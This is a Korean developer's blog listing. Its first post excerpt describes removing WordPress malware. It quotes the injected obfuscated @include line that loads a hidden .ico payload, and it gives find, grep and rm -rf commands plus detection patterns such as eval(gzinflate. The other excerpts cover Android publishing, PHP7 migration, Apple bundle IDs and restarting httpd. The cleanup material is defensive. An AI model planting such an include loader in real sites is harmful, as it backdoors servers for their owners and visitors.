0211월/20

index.php, .2ec67e7e.ico 파일 생성 malware

www-data index.php 파일이나 .2ec67e7e.ico 이런 ico 파일들이 생성된 경우, wordpress plugin 등에서 유입된 멀웨어를 의심해야한다. 워드프레스가 설치된 서버에는 전체적으로 적용되는 사안이다. 귀찬.. 일단 원천봉쇄는 뒤로하고 파일들을 찾아서 제거하자. index.php 의 내용은 이렇다. <?php /*5693b*/ @include “\057ho\155e/.\144d5\0640e\0670.\151co”; /*5693b*/ unphp.net 에서 풀어보면.. ico파일 include하는 형태.. 만든놈 나가 죽었으면.. find -name index.php find -name index.php -exec rm -rf {} \; find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ | xargs rm -rf find -name “*.php” | egrep ‘\.[1-z]{8}.php’ find -name “*.php” | egrep ‘\.[1-z]{8}.php’ | xargs rm -rf find . -type d -name ‘forum’ find . -type d -name ‘forum’ | xargs rm -rf find . -type d -name ‘journal’ find . -type d -name ‘journal’ | xargs rm -rf 이런것들 찾아서 제거해주면 되겠는데 php 파일들은 날리기전에 체크한번씩 해보고.. 엄한거 지우면 골치아프니까 find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION *” find . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs() *” find . -type f -name ‘*.php’ | xargs grep -l ” *@include *” find . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs *” find . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *(더보기…

288월/20

[2020.07 (주)페이즈렙] 오늘 뭐먹지? android

– 회사 : (주)페이즈렙 – app url : https://play.google.com/store/apps/details?id=com.phaserep.todayfood – 음식 랜덤 선별 어플리케이션 – 네이티브앱, 웹사이트 개발 및 광고 진행 – 카카오 adfit, google admob외 다수 광고 진행, 종료 다이얼로그 팝업 광고 등 – IDE android studio, kotlin, 서버 ubuntu 18.04, php7, mysql

207월/20

애플 앱스토어 번들아이디(bundle id) 찾기

앱 광고를 진행하는 도중 apple군 앱의 번들아이디가 필요한 경우가 있었다. apple쪽.. 아직 아이폰도 써보지 않아서 뭔가 생소하다. 구글 스토어의 경우 url에 id가 명시되어 있어서 편리하다. https://play.google.com/store/apps/details?id=com.corenet.AppManner 어쨋든 애플의 경우 아직 방법을 모르는건지 bundle id 찾기가 까다롭다. 앱스토어에 접속한다. https://apps.apple.com/kr/app/l-point-%EC%97%98%ED%8F%AC%EC%9D%B8%ED%8A%B8/id473250588 url 마지막 부분 id고유번호를 저장해둔다. 아래 주소로 접근한다. https://itunes.apple.com/lookup?id=고유번호 txt 파일을 다운로드 받고 bundle id를 찾는다. “bundleId”:”com.lottecard.LotteMembers”  

285월/20

php7 마이그레이션 대체

mysql_query(query) => mysqli_query(connection, query) mysql_fetch_assoc => mysqli_fetch_assoc mysql_fetch_array => mysqli_fetch_array mysql_num_rows => mysqli_num_rows mysql_affected_rows() => mysqli_affected_rows(connection) mysql_data_seek => mysqli_data_seek   ereg(pattern, source) => preg_match(/pattern/, source)  

144월/20

JCenter(Bintray) 배포 방법

Android Module을 개발 완료하였다면 배포방안이 필요하다. Bintray에 업로드를 하고 JCenter를 연결하여 해결할 수 있다. 그렇게 되면 아래와같이 dependencies 항목에 추가할 수 있게 된다. dependencies { implementation ‘kr.co.paep:paep-sdk:1.0.1’ } https://bintray.com/ 에 회원가입을 한다. open source로 가입하도록 한다. repository를 하나 생성해준다. 이름을 명시해주고, Type을 Maven 으로 선택하였다. 우측상단의 프로필을 선택하여 Edit Profile에 접속하면 API Key를 얻을 수 있다. 기록해두자. 안드로이드 스튜디오에서 gradle 작업을 진행한다. project build.gradle buildscript { repositories { jcenter() } dependencies { classpath ‘com.jfrog.bintray.gradle:gradle-bintray-plugin:1.+’ classpath ‘com.github.dcendents:android-maven-gradle-plugin:2.1’ } } module build.gradle ext { bintrayRepo = ‘paep’ bintrayName = ‘paep-sdk’ publishedGroupId = ‘kr.co.paep’ libraryName = ‘paep-sdk’ artifact = ‘paep-sdk’ libraryDescription = ‘PAEP adx library’ siteUrl = ‘https://github.com/phaserep/paep-android-sdk’ gitUrl = ‘https://github.com/phaserep/paep-android-sdk.git’ libraryVersion = ‘1.0.1’ developerId = ‘jakeyu’ // Maven plugin uses this. I don’t know if it needs to be anything special. developerName = ‘Jake Yu’ developerEmail = ‘jake@phaserep.com’ licenseName = ‘The MIT License (MIT)’ licenseUrl = ‘https://opensource.org/licenses/MIT’ allLicenses = [“MIT”] } android { } dependencies { } apply plugin: ‘com.github.dcendents.android-maven’ group = publishedGroupId // Maven Group ID for the artifact install { repositories.mavenInstaller { // This generates POM.xml with proper parameters pom { project { packaging ‘aar’ groupId publishedGroupId artifactId artifact // Add your description here name libraryName description libraryDescription url siteUrl더보기…

024월/20

httpd 프로세스 누적 처리

httpd 프로세스가 누적되는 경우가 종종 있다. 특히 워드프레스.. 음 안쓰기도 뭐하고.. 무거운 워드프레스를 다 해집기 보다는.. 그냥 재시작 처리를 해두는게 나을지도 #!/bin/sh while ( true ) ; do if [ “`ps aux | grep httpd | wc -l`” -ge “50” ] ; then systemctl restart httpd date >> /home/engineer/shell/apache_auto_restart.log fi sleep 10 done 프로세스 수량 50은.. 봐가면서 변경